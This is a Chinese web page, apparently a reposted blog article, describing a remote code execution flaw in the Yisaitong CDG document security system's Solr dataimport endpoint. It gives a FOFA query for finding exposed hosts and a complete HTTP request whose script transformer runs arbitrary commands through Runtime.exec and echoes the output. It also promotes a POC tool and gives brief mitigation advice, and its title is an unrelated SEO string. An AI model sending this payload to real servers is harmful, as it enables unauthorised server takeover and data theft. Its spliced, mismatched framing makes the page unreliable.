当前位置：首页 > news >正文

知名高端网站建设企业wordpress文本块表格

news 2025/12/20 6:10:13

知名高端网站建设企业,wordpress文本块表格,重庆有哪些做优化的公司,网站建设方案打包亿赛通电子文档安全管理系统 RCE漏洞一、产品简介二、漏洞概述三、复现环境四、漏洞复现小龙POC检测: 五、修复建议免责声明#xff1a;请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失… 亿赛通电子文档安全管理系统 RCE漏洞一、产品简介二、漏洞概述三、复现环境四、漏洞复现小龙POC检测: 五、修复建议免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。一、产品简介亿赛通电子文档安全管理系统简称CDG是一款电子文档安全加密软件该系统利用驱动层透明加密技术通过对电子文档的加密保护防止内部员工泄密和外部人员非法窃取企业核心重要数据资产对电子文档进行全生命周期防护系统具有透明加密、主动加密、智能加密等多种加密方式用户可根据部门涉密程度的不同如核心部门和普通部门部署力度轻重不一的梯度式文档加密防护实现技术、管理、审计进行有机的结合在内部构建起立体化的整体信息防泄露体系使得成本、效率和安全三者达到平衡实现电子文档的数据安全。二、漏洞概述亿赛通电子文档安全管理系统/solr/flow/dataimport接口处存在远程代码执行漏洞未经授权的攻击者可通过此漏洞执行任意指令从而获取服务器权限。三、复现环境 FOFAapp“亿赛通-电子文档安全管理系统” 四、漏洞复现 burp抓包发送的POC数据 POST /solr/flow/dataimport?commandfull-importverbosefalsecleanfalsecommitfalsedebugtruecoretikanamedataimportdataConfig%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22执行的命令%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1383.67 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Host: your-ip?xml version1.0 encodingUTF-8?RDFitem//RDFburp成功回显截图 ceye后台查看小龙POC检测: 说明一下由于监管强制要求POC要等护网后才能开放小龙POC传送门: 小龙POC工具五、修复建议设置安全组仅对可信地址开放升级至安全版本

查看全文

http://www.pierceye.com/news/3498/